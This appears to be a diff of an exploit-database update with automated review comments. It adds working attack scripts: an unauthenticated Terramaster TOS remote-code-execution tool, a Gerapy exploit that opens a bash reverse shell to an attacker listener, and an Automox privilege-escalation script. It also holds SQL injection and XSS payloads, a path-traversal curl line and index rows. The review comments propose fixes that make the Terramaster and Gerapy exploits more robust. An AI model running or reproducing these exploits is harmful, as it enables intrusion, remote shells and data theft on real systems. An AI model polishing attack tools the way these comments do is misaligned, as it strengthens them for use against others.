[9] Vulnerable GET parameter: tour_id=[SQLi]
[PoC] http://localhost/vam/index.php?page=tour_detail&tour_id=[SQLi]

113
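--- a/exploits/php/webapps/50635.py
+++ b/exploits/php/webapps/50635.py
@@ -0,0 +1,113 @@
+# Exploit Title: Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 12/24/2021
+# Exploit Author: n0tme (thatsn0tmysite)
+# Full Write-Up: https://thatsn0tmy.site/posts/2021/12/how-to-summon-rces/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: TOS 4.2.X (4.2.15-2107141517)
+# Tested on: 4.2.15, 4.2.10
+#/bin/env python
+import urllib3
+import requests
+import json
+import argparse
+import hashlib
+import time
+import os
+TARGET = None
+MAC_ADDRESS = None
+PWD = None
+TIMESTAMP = None
+def tos_encrypt_str(toencrypt):
+key = MAC_ADDRESS[6:]
+return hashlib.md5(f"{key}{toencrypt}".encode("utf8")).hexdigest()
+def user_session(session, username):
+session.cookies.clear()
+cookies = {"kod_name":username, "kod_token":tos_encrypt_str(PWD)}
+if username == "guest":
+cookies = {"kod_name":"guest", "kod_token":tos_encrypt_str("")}
+for name,value in cookies.items():
+session.cookies[name] = value
+def download(session, path, save_as=None):
+user_session(session, "guest")
+r=session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path":path})
+filename = os.path.basename(path)
+if save_as is not None:
+filename = save_as
+with open(filename, "wb") as file:
+file.write(r.content)
+def get_admin_users(session):
+download(session, "/etc/group", save_as="/tmp/terramaster_group")
+with open("/tmp/terramaster_group", "r") as groups:
+for line in groups:
+line = line.strip()
+fields = line.split(':')
+if fields[0] == "admin":
+users = fields[3].split(",")
+os.remove("/tmp/terramaster_group")
+return users
+if __name__ == '__main__':
+p = argparse.ArgumentParser()
+p.add_argument(dest="target", help="Target URL (e.g. http://10.0.0.100:8181)")
+p.add_argument("--cmd", dest="cmd", help="Command to run", default="id")
+p.add_argument("-d", "--download", dest="download", help="Only download file", default=None)
+p.add_argument("-o", "--output", dest="save_as", help="Save downloaded file as", default=None)
+p.add_argument("-c", "--create", dest="create", help="Only create admin user (format should be admin:password)", default=None)
+p.add_argument("--tor", dest="tor", default=False, action="store_true", help="Use TOR")
+p.add_argument("--rce", dest="rce", default=0, type=int, help="RCE to use (1 and 2 have no output)")
+args = p.parse_args()
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+TARGET = args.target
+s = requests.Session()
+if args.tor:
+s.proxies = {"http":"socks5://127.0.0.1:9050", "https": "socks5://127.0.0.1:9050"}
+s.headers.update({"user-device":"TNAS", "user-agent":"TNAS"})
+r=s.post(f"{TARGET}/module/api.php?mobile/wapNasIPS")
+try:
+j = r.json()
+PWD = j["data"]["PWD"]
+MAC_ADDRESS = j["data"]["ADDR"]
+except KeyError:
+exit(1)
+TIMESTAMP = str(int(time.time()))
+s.headers.update({"signature": tos_encrypt_str(TIMESTAMP), "timestamp": TIMESTAMP})
+s.headers.update({"authorization": PWD})
+if args.download != None:
+download(s, args.download, save_as=args.save_as)
+exit(0)
+#RCEs
+RCEs=[f"{TARGET}/tos/index.php?app/del&id=0&name=;{args.cmd};xx%23",
+f"{TARGET}/tos/index.php?app/hand_app&name=;{args.cmd};xx.tpk", #BLIND
+f"{TARGET}/tos/index.php?app/app_start_stop&id=ups&start=0&name=donotcare.*.oexe;{args.cmd};xx"] #BLIND
+for admin in get_admin_users(s):
+user_session(s, admin)
+if args.create != None:
+user, password = args.create.split(":")
+groups = json.dumps(["allusers", "admin"])
+r=s.post(f"{TARGET}/module/api.php?mobile/__construct")
+r=s.post(f"{TARGET}/module/api.php?mobile/set_user_information", data={"groups":groups, "username":user,"operation":"0","password":password,"capacity":""})
+if "create user successful!" in str(r.content, "utf8"):
+print(r.content)
+break
+continue
+r = s.get(RCEs[args.rce])
+content = str(r.content, "utf-8")
+if "<!--user login-->" not in content:
+print(content)
+exit(0)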
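Review bot: `get_admin_users` falls off the end and returns `None` when no line of the downloaded group file starts with `admin`, so the `for admin in get_admin_users(s):` loop in the main block fails with `TypeError` and the temp file is left behind, because `os.remove` sits inside the matched branch. The function also writes to the fixed path `/tmp/terramaster_group`, a predictable filename in a shared directory that another local user on the operator's host can pre-create or symlink before the script runs; parsing the response body in memory removes both the file and the cleanup, as in the rewrite below. Separately, `download` never checks `r.status_code`, so a 4xx/5xx body is written out as if it were the requested file (`r.raise_for_status()` before the `open`), the `except KeyError` around `r.json()` does not cover the `ValueError` a non-JSON reply raises, and `args.download != None` / `args.create != None` should be `is not None`.
```python
def get_admin_users(session):
    user_session(session, "guest")
    r = session.post(f"{TARGET}/module/api.php?mobile/fileDownload", data={"path": "/etc/group"})
    r.raise_for_status()
    for line in r.text.splitlines():
        fields = line.strip().split(':')
        if len(fields) > 3 and fields[0] == "admin":
            return [u for u in fields[3].split(",") if u]
    return []
```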


@ -0,0 +1,60 @@
# Exploit Title: openSIS Student Information System 8.0 - 'multiple' SQL Injection
# Date: 26/12/2021
# Exploit Author: securityforeveryone.com
# Author Mail: hello[AT]securityforeveryone.com
# Vendor Homepage: https://opensis.com
# Software Link: https://opensis.com
# Version: 8.0 Community Edition
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
'''
DESCRIPTION
A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v8.0 via the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to /TransferredOutModal.php.
The vulnerability is found in the "student_id" and "TRANSFER{SCHOOL]" parameters in POST request sent to page /TransferredOutModal.php.
Example:
POST /TransferredOutModal.php?modfunc=detail
Post Data: student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
if an attacker exploits this vulnerability, attacker may access private data in the database system.
EXPLOITATION
POST /TransferredOutModal.php?modfunc=detail HTTP/1.1
Host: localhost
User-Agent: user-agent
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cookie
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
student_id=1[SQL]&button=Save&TRANSFER[SCHOOL]=[SQL]&TRANSFER[Grade_Level]=5
Example sqlmap Command: sqlmap.py -r request.txt --level 5 --risk 3 -p student_id --random-agent --dbs
Example Payloads:
Payload1: student_id=(SELECT (CASE WHEN (2108=2108) THEN 1 ELSE (SELECT 5728 UNION SELECT 5943) END))&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload2: student_id=1 AND (SELECT 5604 FROM(SELECT COUNT(*),CONCAT(0x7162766a71,(SELECT (ELT(5604=5604,1))),0x717a6a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
Payload3: student_id=1 AND (SELECT 6111 FROM (SELECT(SLEEP(5)))JtuC)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5
ABOUT SECURITY FOR EVERYONE TEAM
We are a team that has been working on cyber security in the industry for a long time.
In 2020, we created securityforeveyone.com where everyone can test their website security and get help to fix their vulnerabilities.
We have many free tools that you can use here: https://securityforeveryone.com/tools/free-security-tools
'''


@ -0,0 +1,22 @@
# Exploit Title: Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)
# Exploit Author: Oscar Gutierrez (m4xp0w3r)
# Date: January 4, 2021
# Vendor Homepage: https://www.projeqtor.org/en/
# Software Link: https://www.projeqtor.org/en/product-en/downloads
# Tested on: Ubuntu, LAAMP
# Vendor: Projeqtor
# Version: v9.3.1
# Exploit Description:
Projeqtor version 9.3.1 suffers from a stored XSS vulnerability via SVG file upload. A low level user can upload svg images that contain malicious Javascript. In this way an attacker can escalate privileges and upload a malicious plugin which results in arbitrary code execution in the server hosting the application.
# Steps to reproduce:
Upload the following XML code as an SVG file and change the xlink for a location that you control. Once the administrator user opens the attachment, the Javascript code hosted by the attacker will execute.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script xlink:href="<script src=CHANGE THIS FOR THE LOCATION OF YOUR SCRIPT></script>"></script>
</svg>
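Review bot: The header's `# Date: January 4, 2021` is presumably a typo for 2022, since the neighbouring entries in this update (AAWP, Gerapy) are dated January 2022, and `# Tested on: Ubuntu, LAAMP` presumably means `LAMP`. The description claims privilege escalation and plugin-based code execution on the server, but the steps only show script execution in an administrator's session; either name the plugin-upload step or scope the impact statement to what is demonstrated, so readers can judge severity. The author is also recorded differently in the index (`"Oscar Gil Gutierrez"` in files_exploits.csv) than in this header (`Oscar Gutierrez (m4xp0w3r)`); the two should agree.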


@ -0,0 +1,16 @@
# Exploit Title: WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)
# Date: 04/01/2022
# Exploit Author: Andrea Bocchetti
# Vendor Homepage: https://getaawp.com/
# Software Link: https://getaawp.com/
# Version: 3.16
# Tested on: Windows 10 - Chrome, WordPress 5.8.2
# Proof of Concept:
# 1- Install and activate AAWP 3.16 plugin.
# 2- Go to https://localhost.com/wp-admin/admin.php?page=aawp-settings&tab=XXXX
# 3- Add payload to the Tab, the XSS Payload: %22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y
# 4- XSS has been triggered.
# Go to this url "http://localhost/wp-admin/admin.php?page=aawp-settings&tab=%22onclick%3Dprompt%288%29%3E%3Csvg%2Fonload%3Dprompt%288%29%3E%22%40x.y"
XSS will trigger.
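Review bot: Step 2 points at `https://localhost.com/wp-admin/...` while the final URL uses `http://localhost/wp-admin/...`; both should use the same placeholder host, e.g. `http://localhost/wp-admin/admin.php?page=aawp-settings&tab=XXXX`. The advisory says "(Authenticated)" but never states the minimum WordPress role that can reach the `aawp-settings` page, which is what determines the real severity of a reflected XSS under wp-admin — a `# Required role:` header line would help triage. `# 3- Add payload to the Tab` reads more clearly as `# 3- Place the payload in the tab parameter`.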

130
exploits/python/remote/50640.py Executable file

@ -0,0 +1,130 @@
# Exploit Title: Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)
# Date: 03/01/2022
# Exploit Author: Jeremiasz Pluta
# Vendor Homepage: https://github.com/Gerapy/Gerapy
# Version: All versions of Gerapy prior to 0.9.8
# CVE: CVE-2021-43857
# Tested on: Gerapy 0.9.6
# Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
#!/usr/bin/python
import sys
import re
import argparse
import pyfiglet
import requests
import time
import json
import subprocess
banner = pyfiglet.figlet_format("CVE-2021-43857")
print(banner)
print('Exploit for CVE-2021-43857')
print('For: Gerapy < 0.9.8')
login = "admin" #CHANGE ME IF NEEDED
password = "admin" #CHANGE ME IF NEEDED
class Exploit:
def __init__(self, target_ip, target_port, localhost, localport):
self.target_ip = target_ip
self.target_port = target_port
self.localhost = localhost
self.localport = localport
def exploitation(self):
payload = """{"spider":"`/bin/bash -c 'bash -i >& /dev/tcp/""" + localhost + """/""" + localport + """ 0>&1'`"}"""
#Login to the app (getting auth token)
url = "http://" + target_ip + ":" + target_port
r = requests.Session()
print("[*] Resolving URL...")
r1 = r.get(url)
time.sleep(3)
print("[*] Logging in to application...")
r2 = r.post(url + "/api/user/auth", json={"username":login,"password":password}, allow_redirects=True)
time.sleep(3)
if (r2.status_code == 200):
print('[*] Login successful! Proceeding...')
else:
print('[*] Something went wrong!')
quit()
#Create a header out of auth token (yep, it's bad as it looks)
dict = json.loads(r2.text)
temp_token = 'Token '
temp_token2 = json.dumps(dict['token']).strip('"')
auth_token = {}
auth_token['Authorization'] = temp_token + temp_token2
#Get the project list
print("[*] Getting the project list")
r3 = r.get(url + "/api/project/index", headers=auth_token, allow_redirects=True)
time.sleep(3)
if (r3.status_code != 200):
print("[!] Something went wrong! Maybe the token is corrupted?")
quit();
#Parse the project name for a request (yep, it's worse than earlier)
dict = r3.text # [{'name': 'test'}]
dict2 = json.dumps(dict)
dict3 = json.loads(dict2)
dict3 = json.loads(dict3)
name = dict3[0]['name']
print("[*] Found project: " + name)
#use the id to check the project
print("[*] Getting the ID of the project to build the URL")
r4 = r.get(url + "/api/project/" + name + "/build", headers=auth_token, allow_redirects=True)
time.sleep(3)
if (r4.status_code != 200):
print("[*] Something went wrong! I can't reach the found project!")
quit();
#format the json to dict
dict = r4.text
dict2 = json.dumps(dict)
dict3 = json.loads(dict2)
dict3 = json.loads(dict3)
id = dict3['id']
print("[*] Found ID of the project: ", id)
time.sleep(1)
#netcat listener
print("[*] Setting up a netcat listener")
listener = subprocess.Popen(["nc", "-nvlp", self.localport])
time.sleep(3)
#exec the payload
print("[*] Executing reverse shell payload")
print("[*] Watchout for shell! :)")
r5 = r.post(url + "/api/project/" + str(id) + "/parse", data=payload, headers=auth_token, allow_redirects=True)
listener.wait()
if (r5.status_code == 200):
print("[*] It worked!")
listener.wait()
else:
print("[!] Something went wrong!")
listener.terminate()
def get_args():
parser = argparse.ArgumentParser(description='Gerapy < 0.9.8 - Remote Code Execution (RCE) (Authenticated)')
parser.add_argument('-t', '--target', dest="url", required=True, action='store', help='Target IP')
parser.add_argument('-p', '--port', dest="target_port", required=True, action='store', help='Target port')
parser.add_argument('-L', '--lh', dest="localhost", required=True, action='store', help='Listening IP')
parser.add_argument('-P', '--lp', dest="localport", required=True, action='store', help='Listening port')
args = parser.parse_args()
return args
args = get_args()
target_ip = args.url
target_port = args.target_port
localhost = args.localhost
localport = args.localport
exp = Exploit(target_ip, target_port, localhost, localport)
exp.exploitation()
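Review bot: `exploitation` ignores most of what `__init__` stored: the `payload` and `url` lines read the module-level globals `localhost`, `localport`, `target_ip` and `target_port` instead of the instance attributes, so only `self.localport` at the `nc` call actually comes from the object and the class cannot be reused with other arguments — `url = "http://" + self.target_ip + ":" + self.target_port`, with the same `self.` substitution in the `payload` line. The json.dumps/json.loads round-trips after the project-list and build requests reduce to `name = r3.json()[0]['name']` and `project_id = r4.json()['id']`, which also stops shadowing the `dict` and `id` builtins. Smaller points: the `#!/usr/bin/python` shebang only takes effect on line 1, the `quit();` calls inside a method make the script impossible to import or test, and `pyfiglet` is a third-party dependency used only for the banner.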


@ -0,0 +1,32 @@
# Exploit Title: TRIGONE Remote System Monitor 3.61 - Unquoted Service Path
# Discovery by: Yehia Elghaly
# Date: 30-12-2021
# Vendor Homepage: https://www.trigonesoft.com/
# Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe
# Tested Version: 3.61
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 7 x86 - Windows Server 2016 x64
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
TRIGONE Remote System Monitor Server RemoteSystemMonitorService
C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe
Auto
C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: RemoteSystemMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv
er\RemoteSystemMonitorService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : TRIGONE Remote System Monitor Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
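Review bot: The `sc qc` step queries `srvInventoryWebServer`, but the output shown below it is for `RemoteSystemMonitorService`, so the command line looks like a leftover from another advisory and would not produce that output; it should read `C:\>sc qc RemoteSystemMonitorService`. `BINARY_PATH_NAME` is split across two lines (`Serv` / `er\RemoteSystemMonitorService.exe`) by console wrapping, which obscures the unquoted path the advisory is about — join it onto one line. The `SERVICE_START_NAME : LocalSystem` line is what makes this a privilege issue rather than a nuisance and deserves a one-line remark in the header.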


@ -0,0 +1,42 @@
# Exploit Title: Automox Agent 32 - Local Privilege Escalation
# Date: 13/12/2021
# Exploit Author: Greg Foss
# Writeup: https://www.lacework.com/blog/cve-2021-43326/
# Vendor Homepage: https://www.automox.com/
# Software Link: https://support.automox.com/help/agents
# Version: 31, 32, 33
# Tested on: Windows 10
# Language: PowerShell
# CVE: CVE-2021-43326
New-Item -ItemType Directory -Force -Path $HOME\Desktop\automox\
$payload = "whoami >> $HOME\Desktop\automox\who.txt"
echo ""
echo "Watching for Automox agent interaction..."
echo ""
for (($i = 0); $i -lt 500; $i++) {
if (Test-Path -Path \ProgramData\amagent\execDir*\*.ps1) {
try {
$dir = Get-ChildItem \ProgramData\amagent\execDir* | Select-Object Name
$dir = $dir.name
$file = Get-ChildItem \ProgramData\amagent\$dir\*.ps1 | Select-Object Name
$file = $file.name
(Get-Content -Path \ProgramData\amagent\$dir\$file -Raw) -replace "#endregion", "$payload" | Set-Content -Path \ProgramData\amagent\$dir\$file
cp -r \ProgramData\amagent\$dir $HOME\Desktop\automox\
echo 'popped :-)'
Start-Sleep 5
echo ''
echo 'cloning all powershell script content...'
for (($i = 0); $i -lt 100; $i++) {
cp -r \ProgramData\amagent\* $HOME\Desktop\automox\ -Force
Start-Sleep 1
}
exit
} catch {
throw $_.Exception.Message
}
} else {
echo $i
Start-Sleep 1
}
}
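Review bot: The inner `for (($i = 0); $i -lt 100; $i++)` loop reuses the outer loop's `$i`; it only works because `exit` follows, and a separate counter (`$j`) would make that obvious. `throw $_.Exception.Message` inside the catch discards the original error record and its position; a bare `throw` (or `throw $_`) rethrows it intact. The header lists affected versions 31, 32 and 33 but no fixed version, which is the detail defenders need most here; a `# Fixed in: <agent version, see writeup>` line would help.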


@ -0,0 +1,12 @@
# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/
POC
curl http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts


@ -6808,6 +6808,7 @@ id,file,description,date,author,type,platform,port
50516,exploits/windows/dos/50516.py,"Xlight FTP 3.9.3.1 - Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
50535,exploits/windows/dos/50535.py,"Pinkie 2.15 - TFTP Remote Buffer Overflow (PoC)",1970-01-01,"Yehia Elghaly",dos,windows,
50536,exploits/windows/dos/50536.py,"Modbus Slave 7.3.1 - Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",dos,windows,
50613,exploits/hardware/dos/50613.py,"Siemens S7 Layer 2 - Denial of Service (DoS)",1970-01-01,RoseSecurity,dos,hardware,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",1970-01-01,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",1970-01-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",1970-01-01,KuRaK,local,linux,
@ -11426,6 +11427,8 @@ id,file,description,date,author,type,platform,port
50574,exploits/windows/local/50574.txt,"MTPutty 1.0.1.21 - SSH Password Disclosure",1970-01-01,"Sedat Ozdemir",local,windows,
50591,exploits/macos/local/50591.py,"Laravel Valet 2.0.3 - Local Privilege Escalation (macOS)",1970-01-01,leonjza,local,macos,
50598,exploits/windows/local/50598.txt,"Microsoft Internet Explorer / ActiveX Control - Security Bypass",1970-01-01,hyp3rlinx,local,windows,
50633,exploits/windows/local/50633.txt,"TRIGONE Remote System Monitor 3.61 - Unquoted Service Path",1970-01-01,"Yehia Elghaly",local,windows,
50642,exploits/windows/local/50642.ps1,"Automox Agent 32 - Local Privilege Escalation",1970-01-01,"Greg Foss",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@ -18584,6 +18587,12 @@ id,file,description,date,author,type,platform,port
50590,exploits/java/remote/50590.py,"Apache Log4j2 2.14.1 - Information Disclosure",1970-01-01,leonjza,remote,java,
50592,exploits/java/remote/50592.py,"Apache Log4j 2 - Remote Code Execution (RCE)",1970-01-01,kozmer,remote,java,
50599,exploits/windows/remote/50599.txt,"Oliver Library Server v5 - Arbitrary File Download",1970-01-01,"Mandeep Singh",remote,windows,
50618,exploits/multiple/remote/50618.py,"ConnectWise Control 19.2.24707 - Username Enumeration",1970-01-01,"Luca Cuzzolin",remote,multiple,
50620,exploits/hardware/remote/50620.py,"Accu-Time Systems MAXIMUS 1.0 - Telnet Remote Buffer Overflow (DoS)",1970-01-01,"Yehia Elghaly",remote,hardware,
50629,exploits/android/remote/50629.py,"AWebServer GhostBuilding 18 - Denial of Service (DoS)",1970-01-01,"Andres Ramos",remote,android,
50638,exploits/windows/remote/50638.txt,"TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Fabiano Golluscio",remote,windows,
50639,exploits/hardware/remote/50639.txt,"Dixell XWEB 500 - Arbitrary File Write",1970-01-01,"Roberto Palamaro",remote,hardware,
50640,exploits/python/remote/50640.py,"Gerapy 0.9.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Jeremiasz Pluta",remote,python,
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php,
@ -44691,3 +44700,26 @@ id,file,description,date,author,type,platform,port
50609,exploits/php/webapps/50609.py,"WBCE CMS 1.5.1 - Admin Password Reset",1970-01-01,citril,webapps,php,
50610,exploits/php/webapps/50610.py,"phpKF CMS 3.00 Beta y6 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50611,exploits/php/webapps/50611.txt,"Exponent CMS 2.6 - Multiple Vulnerabilities",1970-01-01,heinjame,webapps,php,
50612,exploits/php/webapps/50612.txt,"CMSimple 5.4 - Cross Site Scripting (XSS)",1970-01-01,heinjame,webapps,php,
50614,exploits/php/webapps/50614.txt,"RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50615,exploits/php/webapps/50615.txt,"RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50616,exploits/php/webapps/50616.txt,"RiteCMS 3.1.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50617,exploits/php/webapps/50617.txt,"WordPress Plugin Contact Form Entries 1.1.6 - Cross Site Scripting (XSS) (Unauthenticated)",1970-01-01,"Gaetano Perrone",webapps,php,
50619,exploits/php/webapps/50619.py,"WordPress Plugin WP Visitor Statistics 4.7 - SQL Injection",1970-01-01,"Ron Jost",webapps,php,
50621,exploits/php/webapps/50621.py,"Movie Rating System 1.0 - Broken Access Control (Admin Account Creation) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50622,exploits/php/webapps/50622.py,"Movie Rating System 1.0 - SQLi to RCE (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50623,exploits/php/webapps/50623.py,"Online Admission System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Jeremiasz Pluta",webapps,php,
50624,exploits/php/webapps/50624.py,"WordPress Plugin The True Ranker 2.2.2 - Arbitrary File Read (Unauthenticated)",1970-01-01,"Liad Levy",webapps,php,
50625,exploits/php/webapps/50625.txt,"Library System in PHP 1.0 - 'publisher name' Stored Cross-Site Scripting (XSS)",1970-01-01,"Akash Patil",webapps,php,
50626,exploits/php/webapps/50626.txt,"SAFARI Montage 8.5 - Reflected Cross Site Scripting (XSS)",1970-01-01,"Momen Eldawakhly",webapps,php,
50627,exploits/php/webapps/50627.txt,"Nettmp NNT 5.1 - SQLi Authentication Bypass",1970-01-01,"Momen Eldawakhly",webapps,php,
50628,exploits/php/webapps/50628.txt,"Hostel Management System 2.1 - Cross Site Scripting (XSS)",1970-01-01,"Chinmay Divekar",webapps,php,
50630,exploits/php/webapps/50630.txt,"Hospitals Patient Records Management System 1.0 - 'id' SQL Injection (Authenticated)",1970-01-01,twseptian,webapps,php,
50632,exploits/multiple/webapps/50632.txt,"BeyondTrust Remote Support 6.0 - Reflected Cross-Site Scripting (XSS) (Unauthenticated)",1970-01-01,Malcrove,webapps,multiple,
50631,exploits/php/webapps/50631.txt,"Hospitals Patient Records Management System 1.0 - Account TakeOver",1970-01-01,twseptian,webapps,php,
50634,exploits/php/webapps/50634.txt,"Virtual Airlines Manager 2.6.2 - 'multiple' SQL Injection",1970-01-01,"Milad karimi",webapps,php,
50635,exploits/php/webapps/50635.py,"Terramaster TOS 4.2.15 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,n0tme,webapps,php,
50636,exploits/hardware/webapps/50636.py,"Vodafone H-500-s 3.5.10 - WiFi Password Disclosure",1970-01-01,"Daniel Monzón",webapps,hardware,
50637,exploits/php/webapps/50637.txt,"openSIS Student Information System 8.0 - 'multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
50641,exploits/php/webapps/50641.txt,"Projeqtor v9.3.1 - Stored Cross Site Scripting (XSS)",1970-01-01,"Oscar Gil Gutierrez",webapps,php,
50643,exploits/php/webapps/50643.txt,"WordPress Plugin AAWP 3.16 - 'tab' Reflected Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Andrea Bocchetti",webapps,php,
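Review bot: The `50632` row (BeyondTrust) is inserted before `50631`, while the rest of the added block is in ascending id order; move it after the 50631 row. The author for 50641 is recorded as `"Oscar Gil Gutierrez"` whereas the exploit file's own header says `Oscar Gutierrez (m4xp0w3r)`; the two should match so author searches find the entry.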
